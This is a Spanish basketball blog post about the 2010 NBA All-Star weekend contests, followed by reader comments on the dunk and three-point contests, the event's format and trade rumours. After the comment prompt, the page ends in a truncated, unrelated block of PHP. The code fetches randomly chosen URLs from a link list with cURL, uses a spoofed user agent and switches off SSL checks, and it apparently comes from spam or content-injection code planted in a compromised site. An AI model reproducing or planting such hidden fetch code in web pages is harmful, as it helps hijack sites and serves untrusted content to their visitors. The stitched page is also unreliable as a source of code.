DALLAS 2010: CONCURSOS

14 de February de 2010 por TheDeerHunter

La crisis salpica la NBA. Hoy desayunamos con 400 millones de dólares en pérdidas proyectadas para la campaña en curso, declarados por el propio “Zeus” Stern aunque que no sepamos si la información tendrá algo que ver con la negociación colectiva que se viene abordando.

El caso es que anoche pudimos constatar que lo económico no es lo único que está en crisis en esta liga. Diría que lo que nos ofrecieron fue el espectáculo más vulgar y penoso que hemos podido presenciar en toda la historia de los all stars week-ends… y ya es. La liga ha caído en una evidente crisis de ideas e intenciones en un evento con tanta solera y donde se supone debe primar el espectáculo. A falta de valorar el primer plato, y si no son capaces de cambiar de rumbo, igual no sería mala idea que se ahorraran unos cuantos millones de dólares en la organización de algo que cada vez interesa a menos gente.

¿Qué recordaremos de lo de anoche? ¿Qué es lo que nos deslumbró o nos sorprendió? ¿Qué es lo que nos hizo levantarnos del asiento? ¿Qué es lo que nos hizo soñar?…

Alguno diría con cierta sorna que anoche por fin Nowitzki ganó algo en casa (ejem, no lo digo yo… lo dice nba.com) y no estuvo mal eso de verle anotar desde medio campo. Resulta curioso ver los equipillos que montan para el concurso de “shooting stars” pero, no nos engañemos. Visto uno visto todos.

En el de habilidades pasa un poco lo mismo. Y no lo hicieron mal ni Nash, ni Deron, ni Jennings, como tampoco el repescado Westbrook. No creo que nadie le cuente a sus nietos: “Yo me quedé despierto para ver a Nash ganar aquel concurso de habilidades”

Del concurso de triples yo rescataría la actuación de Stephen Curry, con una ejecución depuradísima y realmente bella. Pero fue Paul Pierce quien se llevó el gato al agua en un concurso que no brilló especialmente por su nivel de acierto. El tercero en discordia había sido “Big Shot” Billups que estuvo decepcionante. Algunos nos alegramos por el bueno de Pierce, en cualquier caso (otros no se alegraron tanto)

Finalmente, algunos esperábamos mucho de Shannon Brown en el concurso de mates. Otros rezaban porque hubiera alguien que le plantase cara a KriptoNate. Decepciones tremendas con las actuaciones de Brown y Gerald Wallace, que obviamente no se habían preparado correctamente. DeRozan y Robinson sí nos ofrecieron algún buen mate… pero nada nuevo en el horizonte. Nos quedamos con la sensación de que ya lo hemos visto todo y que han perdido la capacidad de ilusionarnos con esto. ¿Nate Robinson el mejor matador de la historia? Que no me hagan reir…

Comenta

19 comentarios a esta entrada

  1. Dantley2 dice:
    #1

    Parece que el propio Curry sugirió que debería ser su compañero Morrow el que fuera al concurso de triples, pero parece que Morrow vende poco. En cualquier caso, estoy de acuerdo con Deer, cada vez vale menos este fin de semana. Ojalá tuvieran valor para hacer una especie de Copa del Rey ACB, que es probablemente el mayor acierto ACB.

    De lo de Stern, la cosa está que arde. El sinidicato de jugadores literalmente rompió la propuesta. Stern ha sacado cifras, que en general son ciertas, otra cosa es que no toda la culpa sea del convenio, ni de la crisis. Stern parece que va en serio, porque si no, poco futuro hay. En realidad, harían falta muchos movimientos, uno de ellos volver atrás en el tiempo y reducir la liga a 23 o 25 equipos, pero me temo que es imposible.

    Por cierto, también dijo que los Bobcats parece que van a ser vendidos y se intuye el comprador, adivinen …

      Citar

  2. HeiNeKeN dice:
    #2

    Concurso de mates penoso… el unico que dio algo de espectaculo en toda la noche fue Nash que es un cachondo…

    Se supone que ser seleccionado para el All Star es un reconocimiento a la temporada que estas haciendo y en ocasiones a la carrera que han llevado…
    Yo lo que haria seria hacer 4 equipos de 6 o 7 jugadores cada equipo siendo dos equipos por conferencia y que se enfrentasen en eliminatorias el 1º equipo del Este contra el 2º del Oeste y el 2º del Este contra el 1º del Oeste y luego la final entre los que ganen. Los partidos jugandose en 2 tiempos de 12 minutos por ejemplo…

    El 1º equipo de cada conferencia serian los elegidos en el quinteto mas 2 jugadores elegidos por el entrenador que lleve ese equipo y el 2º equipo los que mas votaciones tengan y no esten en el 1º equipo…

    Por ejemplo este año habria sido algo tipo

    1º Este: Wade-Joe Johnson-LeBron-Garnett-Howard + 2
    2º Este: Rose-Pierce-Wallace-Bosh-Horford + 2

    1º Oeste: Nash-Paul-Anthony-Duncan-Nowitzki + 2
    2º Oeste: Williams-Durant-Randolph-Pau Gasol-Kaman + 2

    A mi me gustaria mas que la actual pachanga…

      Citar

  3. Love Denise dice:
    #3

    ya lo dije hace unos meses, el All-star ya casi no le interesa a nadie, los datos y la audiencia lo dicen, y sobre los concursos, creo que ya todo lo que se tenía que inventar se ha inventado. dudo que veamos en el futuro algún mate nuevo. Lo mejor, un formato Copa del Rey que permitiría que equipos como Portland, Phoenix, Atlanta, Utah, ….que a priori no tienen plantilla para ganar el campeonato por las duras eliminatorias a 7 partidos, pudieran ganar este torneo con rondas a 1 partido, por tanto serían partidos jugados seriamente al 100% y los jugadores tendrían más motivación.
    Robinson ya lleva 3 ganados, el primero fue injusto para mí, debió ganarlo Iguodala, y este último ha sido el tuerto en el país de los ciegos.

      Citar

  4. sergio dice:
    #4

    Si que es una buena idea el mini-campeonato en lugar de tanto concurso, pero hay motivos por los que es difícil de instaurar:

    Primero, estos días son los únicos de cierta relajación que permite la temporada (se ve bastante bien en la actitud de cada uno de ellos en las competiciones que disputan), si también añadieran un parón de 4 o 5 días tras el minitorneo me parecería más probable que se disputara. Estos días también son un magnífico sistema de financiación para la liga, y no solo me refiero a la NBA, tanto la WNBA como la D.League o las competiciones de baloncesto en silla de ruedas tienen su lugar. Hay muchos seguidores que aunque no pueden ver un partido durante la temporada por los horarios, hacen el esfuerzo en permanecer despiertos con la idea de que lograran ver algo interesante durante el All-Star (aunque sea que alguien de tu país juegue en alguna competición)

    Desde luego, es innegable que el nivel del All-Star baja cada año más. No se si habréis visto la competición de H-O-R-S-E de ayer entre Casspo, Rondo y Durant. Una auténtica vergüenza. Se disputaron el premio repitiendo un triple frontal durante más de 10 lanzamientos de cada uno… Nada comparado con el que disputaron Maravich y Gervin en los 70, que está por ahí por Internet.

    En cuanto a los triples, aparte de desear desde el primer momento que ganara Curry por esa mecánica tan plástica, me sorprendió también la forma de tirar de Frye. Sólo un entrenador de tiro puede haber conseguido mejorar tanto el sistema de lanzamiento de un pívot, Mi enhorabuena para él a pesar de su resultado.

    Y ya lo de los mates fue esperpéntico…. Shannon decepcionó de una manera que no recuerdo en toda la historia. Lo de Wallace parecía más un castigo que un privilegio (sólo tengo que pensar en Rudy para ver que hay gente a la que le motiva o motivaba). Gano el que más lo merecía, por mucho que ya no nos haga ninguna gracia que lo consiga. El mejor mate el de DeMar con su compañero Weems. Lo que más me sorprende es que yo innove más en una canasta de minibasket que ellos con los muelles de los que disponen. No creo que esté todo inventado, creo que es un problema de motivación. Quizás el producto esté obsoleto y necesite otro sistema de competición. Sólo dos mates por participante estaría bien, necesita menos preparación y menos inventiva. Desde luego ideas no le faltan, solo tienen que preguntar en internet o ver videos de competiciones de otros paises….

    Espero que esta noche el show sea diferente a lo que nos vienen ofreciendo… aunque tampoco apostaría por ello

      Citar

  5. M dice:
    #5

    Pues sí. Yo creo que gra parte de culpa la tiene la actitud con que muchas “estrellas” o aspirantillos se toman estas cosas, con un supuesto pasotismo aburrido ante la posibilidad de no hacerlo bien, y entre eso, y los clanes que se van por ahí…en fin, una tonterida cada año que pasa mayor.

      Citar

  6. Vader dice:
    #6

    Atencion al ultimo rumor. Segun ESPN Cleveland estaria a punto de fichar a Stoudemire de Phoneix a cambio de Ilgauskas y Hickson. Si se confirma y Amare va con ganas Cleveland puede dar bastante miedito…

    Saludos

      Citar

  7. M dice:
    #7

    Pues sí. Pero no entendería la intención de Phoenix accediendo a ello…

      Citar

  8. CAMPO2 dice:
    #8

    a partir de ahora j.j. hickson se convertira en el mejor del mundo y amare las pasara canutas para hacer numeros y todo gracias al gran NASH

      Citar

  9. Txusma dice:
    #9

    Pues sí que parece que la cosa está cerca… Cleveland añade una pieza más (y vaya pieza) al puzzle ganador y los Suns cierran casi definitivamente una etapa (lo haran del todo cuando se vaya Nash) con un expiring jugosito y un jugador joven interesante. Y Campo2 no dice ninguna tonteria…

      Citar

  10. Txusma dice:
    #10

    Y el tema del All Star es lo de cada año. Cada año nos quedamos despiertos para ver el espectaculo y cada año despotricamos al dia siguiente… Eso sí, al año siguiente volvemos. Algo tendrá que tener, no?
    Los concursos de anoche no pasarán a la historia de ninguna manera aunque creo que siempre mitificamos cualquier tiempo pasado. Anoche, después del concurso comentábamos que el nivel había sido mediocre como en los últimos años pero con una simple consulta a la Wikipedia nos dimos cuenta que no se ha llegado muchas veces a 20 aciertos en una final o que no había pasado casi nunca que el peor jugador hiciera 15… Con el concurso de mates debe pasar más o lo mismo. Tenemos a Michael Jordan, Dominique Wilkins, Vince Carter, etc… en la retina, pero en el pasado tb hubo concursos pufos.
    Yo creo que la raiz de todo esto está en lo q comenta Sergio: estos son los 3-4 dias de descanso de los que gozan todos los jugadores durante la temporada y esto provoca que su relajación sea máxima. Pensad que la mayora de los que están aquí estaran en los Playoffs así que todavía les queda bastante.
    Menos partido por temporada, posiblemente menos equipos y un formato de Copa del Rey como el que comenta Heineken (manteniendo el tema de las elecciones) o uno más clasico con los equipos al completo, podrían ser buenas sugerencias. Y de aquí a 20 años ya volveremos a los mates.

      Citar

  11. NBA LAKERS BLOG dice:
    #11

    No me voy a cansar de decir que este sábado necesita un cambio urgente… ¡URGENTE!

    Y coincido, que no nos vengan con que Robinson es el mejor volcador de la historia… que falta de respeto para los grandes (con doble sentido, jeje).

    Te espero por nuestro blog de los Lakers 😉

    Un abrazo!

    -NM-

      Citar

  12. portu dice:
    #12

    Llevo ya varios años sin ver absolutamente nada del All Star en directo, ya q creo q lo único q ha mejorado un poco tras unos años muy malos es el partido del Domingo, q es muy mal día ya q el Lunes se curra, y ha mejorado únicamente aplicándose en defensa los jugadores un pelín más, siendo más competitivos y no dejando q sus rivales hagan un concurso de mates cada vez q cogen el balón.

    Físicamente no hay posibilidades de grandes mejorías como para q los mates pasasen a un nivel superior, tendrían q aparecer tíos de 190 a 200, q son los q mejor estética aportan en este concurso q ganasen muchos cms respecto a los actuales… imposible por el momento. Pero tb aquí habría q volver un poco a los orígenes, mates con menos chorradas circenses y más plasticidad en el vuelo, fuerza,… creí q este año podría hacer eso Shannon Brown q es sobretodo fuerza pero al final ni siquiera ví sus mates, así q no comento. En cuanto a la estructura del concurso tb mejoraría un pelín sin hacer q pasasen 2 sólo a la final ya q de esa manera a lo mejor los eliminados se han guardado sus mejores mates y no les da tiempo a hacerlos… 4 mates cada uno y suman todos.

    Pero esto son pequeñas mejorías, yo sigo pensando q un tema verdaderamente interesante sería una Copa del Rey, pero es un cambio muy radical para la NBA crear de repente un trofeo nuevo, tb imposible.

    Otra cosilla interesante q tb hemos comentado otras veces sería un USA-Resto del Mundo, seguro q tb habría competitividad a tope, pero sería difícil de incluir sin sustituir a algún otro partido.

    En definitiva este formato actual tiene poquísimo valor para mi q tengo una mentalidad del deporte más a la europea y no tanto del show…

      Citar

  13. Love Denise dice:
    #13

    110% de acuerdo con Portu.
    Añadir que no sé si es que la SuperBowl se promociona muy bien, o que en la NBA algo falla, pero la diferencia de audiencias entre ambas es increible, y no creo que el fútbol americano sea más popular en el mundo que el baloncesto. Apostaría a que por cada 50 que se saben el reglamento en el baloncesto hay 1 que sabe el de fútbol americano (hablo a nivel mundial no solo en USA).

      Citar

  14. sergio dice:
    #14

    Pero es el deporte americano por excelencia… son sus inventores, promotores y principales inversores. Es como decir que el futbol australiano también lo es, o la pelota vasca.. es muy lógico que lo apoyen de esa manera. Amén de los beneficios que les reporta claro..

      Citar

  15. Love Denise dice:
    #15

    Sergio, ya dije que quiero decir en el resto del mundo, no en USA. En el resto del mundo, hay más gente que ve la Superbowl que el All Star o las finales de la NBA, y repito, no creo que el futbol americano sea más popular que el baloncesto, e incluso, seguro que la gente de Europa, Asia.. conoce más jugadores de baloncesto que de football.

      Citar

  16. Uno cualquiera dice:
    #16

    No creo que sea comparable la Superbowl, que es la final de la NFL a 1 sólo partido y que cualquiera que pille por la TV lo vería sólo por la competitividad que hay (similar a la final de la Champions de fútbol) a una pachanga entre estrellas jugando al baloncesto.

    Si la final de la NBA fuera a un sólo partido también tendría audiencias altísimas.

      Citar

  17. Txusma dice:
    #17

    De acuerdo con “uno cualquiera”. No se puede comparar el All Stars Game de la NBA con la final de la SuperBowl que efectivament, es una partido lleno de intensidad y de emociones, sobretodo para los americanos. De hecho, la NFl tb tiene su propio All Stars (Pro Bowl, creo que se llama). Con eso deberíamos comparar.

      Citar

  18. Love Denise dice:
    #18

    Entonces más facil lo pones, si hicieran un torneo tipo Copa, la final sería a 1 partido, por tanto llena de intensidad y emoción.
    Y no veo un argumento sólido el decir “veo la Superbowl sólo porque es la final”, porque yo si no me gusta o no sigo un deporte, tampoco tengo porque ver la final. Vuelvo a seguir apostando a que a nivel mundial es más conocido los Lebron, KObe, O’Neal…. e incluso Pau Gasol, que el tipo que se llevó el MVP en la Superbowl.

      Citar

  19. Txusma dice:
    #19

    Es que solo lo vemos desde nuestro punto de vista. Para que quieren los americanos otra mini competición que les cargue aún más el calendario? A ellos ya le gusta ese espectaculo de 3 dias con fuegos artificiales, animadoras, juegos circenses, mascotas, etc…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>